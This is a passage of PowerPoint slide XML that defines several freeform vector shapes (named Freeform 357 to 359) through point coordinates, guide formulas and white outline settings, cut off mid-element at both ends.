                      <a:pt x="39" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="185"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36224" name="Freeform 357"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1262" y="998"/>
                <a:ext cx="216" cy="134"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 39 w 216"/>
                  <a:gd name="T1" fmla="*/ 25 h 134"/>
                  <a:gd name="T2" fmla="*/ 31 w 216"/>
                  <a:gd name="T3" fmla="*/ 44 h 134"/>
                  <a:gd name="T4" fmla="*/ 46 w 216"/>
                  <a:gd name="T5" fmla="*/ 44 h 134"/>
                  <a:gd name="T6" fmla="*/ 52 w 216"/>
                  <a:gd name="T7" fmla="*/ 47 h 134"/>
                  <a:gd name="T8" fmla="*/ 59 w 216"/>
                  <a:gd name="T9" fmla="*/ 65 h 134"/>
                  <a:gd name="T10" fmla="*/ 69 w 216"/>
                  <a:gd name="T11" fmla="*/ 79 h 134"/>
                  <a:gd name="T12" fmla="*/ 70 w 216"/>
                  <a:gd name="T13" fmla="*/ 68 h 134"/>
                  <a:gd name="T14" fmla="*/ 80 w 216"/>
                  <a:gd name="T15" fmla="*/ 67 h 134"/>
                  <a:gd name="T16" fmla="*/ 92 w 216"/>
                  <a:gd name="T17" fmla="*/ 64 h 134"/>
                  <a:gd name="T18" fmla="*/ 103 w 216"/>
                  <a:gd name="T19" fmla="*/ 79 h 134"/>
                  <a:gd name="T20" fmla="*/ 115 w 216"/>
                  <a:gd name="T21" fmla="*/ 67 h 134"/>
                  <a:gd name="T22" fmla="*/ 137 w 216"/>
                  <a:gd name="T23" fmla="*/ 56 h 134"/>
                  <a:gd name="T24" fmla="*/ 162 w 216"/>
                  <a:gd name="T25" fmla="*/ 50 h 134"/>
                  <a:gd name="T26" fmla="*/ 183 w 216"/>
                  <a:gd name="T27" fmla="*/ 51 h 134"/>
                  <a:gd name="T28" fmla="*/ 196 w 216"/>
                  <a:gd name="T29" fmla="*/ 67 h 134"/>
                  <a:gd name="T30" fmla="*/ 210 w 216"/>
                  <a:gd name="T31" fmla="*/ 75 h 134"/>
                  <a:gd name="T32" fmla="*/ 214 w 216"/>
                  <a:gd name="T33" fmla="*/ 81 h 134"/>
                  <a:gd name="T34" fmla="*/ 213 w 216"/>
                  <a:gd name="T35" fmla="*/ 92 h 134"/>
                  <a:gd name="T36" fmla="*/ 199 w 216"/>
                  <a:gd name="T37" fmla="*/ 111 h 134"/>
                  <a:gd name="T38" fmla="*/ 184 w 216"/>
                  <a:gd name="T39" fmla="*/ 131 h 134"/>
                  <a:gd name="T40" fmla="*/ 176 w 216"/>
                  <a:gd name="T41" fmla="*/ 134 h 134"/>
                  <a:gd name="T42" fmla="*/ 164 w 216"/>
                  <a:gd name="T43" fmla="*/ 128 h 134"/>
                  <a:gd name="T44" fmla="*/ 159 w 216"/>
                  <a:gd name="T45" fmla="*/ 106 h 134"/>
                  <a:gd name="T46" fmla="*/ 150 w 216"/>
                  <a:gd name="T47" fmla="*/ 104 h 134"/>
                  <a:gd name="T48" fmla="*/ 147 w 216"/>
                  <a:gd name="T49" fmla="*/ 127 h 134"/>
                  <a:gd name="T50" fmla="*/ 135 w 216"/>
                  <a:gd name="T51" fmla="*/ 129 h 134"/>
                  <a:gd name="T52" fmla="*/ 126 w 216"/>
                  <a:gd name="T53" fmla="*/ 128 h 134"/>
                  <a:gd name="T54" fmla="*/ 113 w 216"/>
                  <a:gd name="T55" fmla="*/ 117 h 134"/>
                  <a:gd name="T56" fmla="*/ 108 w 216"/>
                  <a:gd name="T57" fmla="*/ 128 h 134"/>
                  <a:gd name="T58" fmla="*/ 89 w 216"/>
                  <a:gd name="T59" fmla="*/ 133 h 134"/>
                  <a:gd name="T60" fmla="*/ 76 w 216"/>
                  <a:gd name="T61" fmla="*/ 125 h 134"/>
                  <a:gd name="T62" fmla="*/ 66 w 216"/>
                  <a:gd name="T63" fmla="*/ 110 h 134"/>
                  <a:gd name="T64" fmla="*/ 61 w 216"/>
                  <a:gd name="T65" fmla="*/ 123 h 134"/>
                  <a:gd name="T66" fmla="*/ 47 w 216"/>
                  <a:gd name="T67" fmla="*/ 128 h 134"/>
                  <a:gd name="T68" fmla="*/ 41 w 216"/>
                  <a:gd name="T69" fmla="*/ 123 h 134"/>
                  <a:gd name="T70" fmla="*/ 28 w 216"/>
                  <a:gd name="T71" fmla="*/ 120 h 134"/>
                  <a:gd name="T72" fmla="*/ 15 w 216"/>
                  <a:gd name="T73" fmla="*/ 99 h 134"/>
                  <a:gd name="T74" fmla="*/ 16 w 216"/>
                  <a:gd name="T75" fmla="*/ 66 h 134"/>
                  <a:gd name="T76" fmla="*/ 14 w 216"/>
                  <a:gd name="T77" fmla="*/ 46 h 134"/>
                  <a:gd name="T78" fmla="*/ 1 w 216"/>
                  <a:gd name="T79" fmla="*/ 17 h 134"/>
                  <a:gd name="T80" fmla="*/ 5 w 216"/>
                  <a:gd name="T81" fmla="*/ 3 h 134"/>
                  <a:gd name="T82" fmla="*/ 31 w 216"/>
                  <a:gd name="T83" fmla="*/ 0 h 134"/>
                  <a:gd name="T84" fmla="*/ 44 w 216"/>
                  <a:gd name="T85" fmla="*/ 11 h 134"/>
                  <a:gd name="T86" fmla="*/ 52 w 216"/>
                  <a:gd name="T87" fmla="*/ 17 h 134"/>
                  <a:gd name="T88" fmla="*/ 46 w 216"/>
                  <a:gd name="T89" fmla="*/ 23 h 134"/>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16"/>
                  <a:gd name="T136" fmla="*/ 0 h 134"/>
                  <a:gd name="T137" fmla="*/ 216 w 216"/>
                  <a:gd name="T138" fmla="*/ 134 h 134"/>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16" h="134">
                    <a:moveTo>
                      <a:pt x="46" y="23"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="39" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="23"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36225" name="Freeform 358"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1112" y="995"/>
                <a:ext cx="78" cy="103"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 41 w 78"/>
                  <a:gd name="T1" fmla="*/ 103 h 103"/>
                  <a:gd name="T2" fmla="*/ 34 w 78"/>
                  <a:gd name="T3" fmla="*/ 97 h 103"/>
                  <a:gd name="T4" fmla="*/ 33 w 78"/>
                  <a:gd name="T5" fmla="*/ 89 h 103"/>
                  <a:gd name="T6" fmla="*/ 38 w 78"/>
                  <a:gd name="T7" fmla="*/ 78 h 103"/>
                  <a:gd name="T8" fmla="*/ 41 w 78"/>
                  <a:gd name="T9" fmla="*/ 75 h 103"/>
                  <a:gd name="T10" fmla="*/ 42 w 78"/>
                  <a:gd name="T11" fmla="*/ 70 h 103"/>
                  <a:gd name="T12" fmla="*/ 39 w 78"/>
                  <a:gd name="T13" fmla="*/ 60 h 103"/>
                  <a:gd name="T14" fmla="*/ 31 w 78"/>
                  <a:gd name="T15" fmla="*/ 59 h 103"/>
                  <a:gd name="T16" fmla="*/ 15 w 78"/>
                  <a:gd name="T17" fmla="*/ 65 h 103"/>
                  <a:gd name="T18" fmla="*/ 9 w 78"/>
                  <a:gd name="T19" fmla="*/ 68 h 103"/>
                  <a:gd name="T20" fmla="*/ 6 w 78"/>
                  <a:gd name="T21" fmla="*/ 68 h 103"/>
                  <a:gd name="T22" fmla="*/ 0 w 78"/>
                  <a:gd name="T23" fmla="*/ 60 h 103"/>
                  <a:gd name="T24" fmla="*/ 0 w 78"/>
                  <a:gd name="T25" fmla="*/ 50 h 103"/>
                  <a:gd name="T26" fmla="*/ 6 w 78"/>
                  <a:gd name="T27" fmla="*/ 50 h 103"/>
                  <a:gd name="T28" fmla="*/ 10 w 78"/>
                  <a:gd name="T29" fmla="*/ 43 h 103"/>
                  <a:gd name="T30" fmla="*/ 14 w 78"/>
                  <a:gd name="T31" fmla="*/ 41 h 103"/>
                  <a:gd name="T32" fmla="*/ 10 w 78"/>
                  <a:gd name="T33" fmla="*/ 23 h 103"/>
                  <a:gd name="T34" fmla="*/ 12 w 78"/>
                  <a:gd name="T35" fmla="*/ 16 h 103"/>
                  <a:gd name="T36" fmla="*/ 13 w 78"/>
                  <a:gd name="T37" fmla="*/ 9 h 103"/>
                  <a:gd name="T38" fmla="*/ 16 w 78"/>
                  <a:gd name="T39" fmla="*/ 9 h 103"/>
                  <a:gd name="T40" fmla="*/ 22 w 78"/>
                  <a:gd name="T41" fmla="*/ 16 h 103"/>
                  <a:gd name="T42" fmla="*/ 36 w 78"/>
                  <a:gd name="T43" fmla="*/ 39 h 103"/>
                  <a:gd name="T44" fmla="*/ 39 w 78"/>
                  <a:gd name="T45" fmla="*/ 44 h 103"/>
                  <a:gd name="T46" fmla="*/ 42 w 78"/>
                  <a:gd name="T47" fmla="*/ 41 h 103"/>
                  <a:gd name="T48" fmla="*/ 42 w 78"/>
                  <a:gd name="T49" fmla="*/ 34 h 103"/>
                  <a:gd name="T50" fmla="*/ 35 w 78"/>
                  <a:gd name="T51" fmla="*/ 19 h 103"/>
                  <a:gd name="T52" fmla="*/ 32 w 78"/>
                  <a:gd name="T53" fmla="*/ 15 h 103"/>
                  <a:gd name="T54" fmla="*/ 29 w 78"/>
                  <a:gd name="T55" fmla="*/ 5 h 103"/>
                  <a:gd name="T56" fmla="*/ 32 w 78"/>
                  <a:gd name="T57" fmla="*/ 2 h 103"/>
                  <a:gd name="T58" fmla="*/ 39 w 78"/>
                  <a:gd name="T59" fmla="*/ 0 h 103"/>
                  <a:gd name="T60" fmla="*/ 44 w 78"/>
                  <a:gd name="T61" fmla="*/ 4 h 103"/>
                  <a:gd name="T62" fmla="*/ 52 w 78"/>
                  <a:gd name="T63" fmla="*/ 12 h 103"/>
                  <a:gd name="T64" fmla="*/ 56 w 78"/>
                  <a:gd name="T65" fmla="*/ 17 h 103"/>
                  <a:gd name="T66" fmla="*/ 58 w 78"/>
                  <a:gd name="T67" fmla="*/ 18 h 103"/>
                  <a:gd name="T68" fmla="*/ 59 w 78"/>
                  <a:gd name="T69" fmla="*/ 4 h 103"/>
                  <a:gd name="T70" fmla="*/ 62 w 78"/>
                  <a:gd name="T71" fmla="*/ 0 h 103"/>
                  <a:gd name="T72" fmla="*/ 67 w 78"/>
                  <a:gd name="T73" fmla="*/ 3 h 103"/>
                  <a:gd name="T74" fmla="*/ 73 w 78"/>
                  <a:gd name="T75" fmla="*/ 8 h 103"/>
                  <a:gd name="T76" fmla="*/ 75 w 78"/>
                  <a:gd name="T77" fmla="*/ 13 h 103"/>
                  <a:gd name="T78" fmla="*/ 78 w 78"/>
                  <a:gd name="T79" fmla="*/ 36 h 103"/>
                  <a:gd name="T80" fmla="*/ 77 w 78"/>
                  <a:gd name="T81" fmla="*/ 54 h 103"/>
                  <a:gd name="T82" fmla="*/ 76 w 78"/>
                  <a:gd name="T83" fmla="*/ 61 h 103"/>
                  <a:gd name="T84" fmla="*/ 70 w 78"/>
                  <a:gd name="T85" fmla="*/ 71 h 103"/>
                  <a:gd name="T86" fmla="*/ 69 w 78"/>
                  <a:gd name="T87" fmla="*/ 81 h 103"/>
                  <a:gd name="T88" fmla="*/ 72 w 78"/>
                  <a:gd name="T89" fmla="*/ 98 h 103"/>
                  <a:gd name="T90" fmla="*/ 69 w 78"/>
                  <a:gd name="T91" fmla="*/ 103 h 103"/>
                  <a:gd name="T92" fmla="*/ 58 w 78"/>
                  <a:gd name="T93" fmla="*/ 100 h 103"/>
                  <a:gd name="T94" fmla="*/ 52 w 78"/>
                  <a:gd name="T95" fmla="*/ 103 h 103"/>
                  <a:gd name="T96" fmla="*/ 41 w 78"/>
                  <a:gd name="T97" fmla="*/ 103 h 103"/>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78"/>
                  <a:gd name="T148" fmla="*/ 0 h 103"/>
                  <a:gd name="T149" fmla="*/ 78 w 78"/>
                  <a:gd name="T150" fmla="*/ 103 h 103"/>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78" h="103">
                    <a:moveTo>
                      <a:pt x="41" y="103"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="34" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="103"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36226" name="Freeform 359"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="876" y="981"/>
                <a:ext cx="189" cy="153"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 20 w 189"/>
                  <a:gd name="T1" fmla="*/ 63 h 153"/>
                  <a:gd name="T2" fmla="*/ 21 w 189"/>
                  <a:gd name="T3" fmla="*/ 42 h 153"/>
                  <a:gd name="T4" fmla="*/ 32 w 189"/>
                  <a:gd name="T5" fmla="*/ 34 h 153"/>
                  <a:gd name="T6" fmla="*/ 48 w 189"/>
                  <a:gd name="T7" fmla="*/ 28 h 153"/>
